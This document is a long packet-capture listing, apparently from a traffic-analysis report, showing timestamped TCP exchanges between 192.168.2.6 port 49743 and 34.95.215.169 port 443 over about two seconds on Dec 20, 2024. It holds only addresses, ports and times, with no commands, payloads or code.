                                                          Dec 20, 2024 15:28:29.813664913 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.813803911 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.825284004 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.825489044 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.827406883 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.827569008 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.830375910 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.830454111 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.909137011 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.909230947 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.911783934 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.911859035 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.914360046 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.914453030 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.917117119 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.917329073 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.920331001 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.920413017 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.922902107 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.922986984 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.925606966 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.925741911 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.928272963 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.928364992 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.931595087 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.931689024 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.934048891 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.934158087 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.937397957 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.937469006 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.939564943 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.939651012 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.942348957 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:29.942435026 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.970695019 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:29.970695019 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.007170916 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.007293940 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.018749952 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.018836021 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.021322012 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.021390915 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.024097919 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.024171114 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.105357885 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.105479956 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.107997894 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.108102083 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.110975981 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.111053944 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.113636017 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.113701105 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.116219997 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.116287947 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.119857073 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.119949102 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.122047901 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.122155905 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.124914885 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.125039101 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.127464056 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.127530098 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.130364895 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.130435944 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.133188963 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.133275032 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.136610985 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.136687994 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.183864117 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.183950901 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.227672100 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.227782965 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.230879068 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.230953932 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.233608961 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.233706951 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.236567020 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.236643076 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.294198036 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.294271946 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.296832085 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.296930075 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.300107956 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.300205946 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.302613974 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.302699089 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.305814981 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.305903912 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.308022976 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.308099985 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.311425924 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.311522007 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.313714027 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.313776970 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.316597939 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.316708088 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.319783926 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.319866896 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.321937084 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.322016001 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.325308084 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.325397968 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.390075922 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.390142918 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.404628992 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.404731989 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.406578064 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.406714916 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.410234928 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.410307884 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.485860109 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.486000061 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.488820076 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.488884926 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.490967035 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.491060972 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.493304014 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.493483067 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.496637106 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.496730089 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.499178886 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.499332905 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.501991034 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.502090931 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.505139112 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.505198956 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.508128881 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.508255959 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.510720968 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.510818005 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.513267994 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.513370037 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.517148018 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.517237902 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.518956900 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.519051075 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.586046934 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.586131096 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.601289988 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.601356983 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.604481936 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.604617119 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.607048035 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.607251883 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.685165882 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.685266018 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.687819958 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.687886000 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.690639973 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.690727949 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.694308996 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.694371939 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.696187019 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.696274996 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.698589087 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.698698044 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.701303005 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.701407909 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.704621077 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.704708099 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.707139015 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.707247019 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.709959984 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.710028887 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.712869883 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.712950945 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.715466976 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.715553045 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.776489019 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.776581049 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.792779922 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.792890072 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.795245886 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.795345068 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.797573090 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.797661066 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.875837088 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.876003027 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.878757000 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.878850937 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.881547928 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.881724119 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.884183884 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.884273052 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.887455940 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.887543917 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.889468908 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.889607906 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.891976118 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.892050982 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.895076036 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.895174980 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.897339106 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.897413969 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.900057077 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.900131941 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.903305054 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.903379917 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.905242920 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.905316114 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.971426010 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.971528053 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.984416008 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.984508991 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.986435890 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.986526966 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:30.989491940 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:30.989659071 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.067861080 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.067960978 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.072294950 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.072357893 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.074173927 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.074264050 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.076787949 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.077013969 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.079940081 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.079998016 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.082278967 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.082365036 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.084850073 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.084969997 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.087496996 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.087560892 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.090369940 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.090447903 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.093065977 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.093153954 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.096075058 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.096224070 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.098496914 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.098659992 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.101079941 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.101162910 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.167378902 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.167520046 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.179646969 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.179734945 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.183307886 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.183393955 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.185141087 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.185229063 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.261421919 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.261518002 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.265448093 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.265539885 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.268254042 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.268320084 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.271079063 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.271143913 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.273633003 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.273706913 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.276127100 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.276206017 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.278817892 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.278939962 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.281630039 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.281729937 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.284096956 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.284240007 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.287385941 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.287482977 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.289546967 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.289638042 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.292176008 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.292294025 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.356666088 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.356786966 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.370861053 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.370953083 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.373543024 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.373615980 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.376456976 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.376544952 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.452724934 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.452801943 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.456816912 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.456899881 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.459806919 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.459884882 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.462246895 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.462431908 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.464953899 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.465039968 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.467305899 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.467421055 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.470393896 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.470505953 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.472846985 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.472975016 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.475542068 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.475759983 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.478184938 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.478240967 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.480921030 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.481029034 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.484127045 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.484308958 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.547940969 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.548007965 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.562930107 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.562989950 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.565304995 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.565386057 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.568038940 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.568133116 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.644283056 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.644356012 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.648652077 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.648722887 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.650789976 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.650890112 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.653459072 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.653548002 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.656506062 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.656598091 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.658674955 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.658760071 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.661226988 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.661308050 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.663774014 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.663863897 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.666721106 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.666805983 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.669167042 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.669306040 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.671744108 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.671920061 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.675481081 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.675579071 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.677381039 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.677449942 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.741242886 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.741316080 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.756807089 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.756927967 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.759013891 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.759157896 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.763338089 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.763417006 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.850675106 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.850780010 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:31.853132010 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:31.853203058 CET49743443192.168.2.634.95.215.169
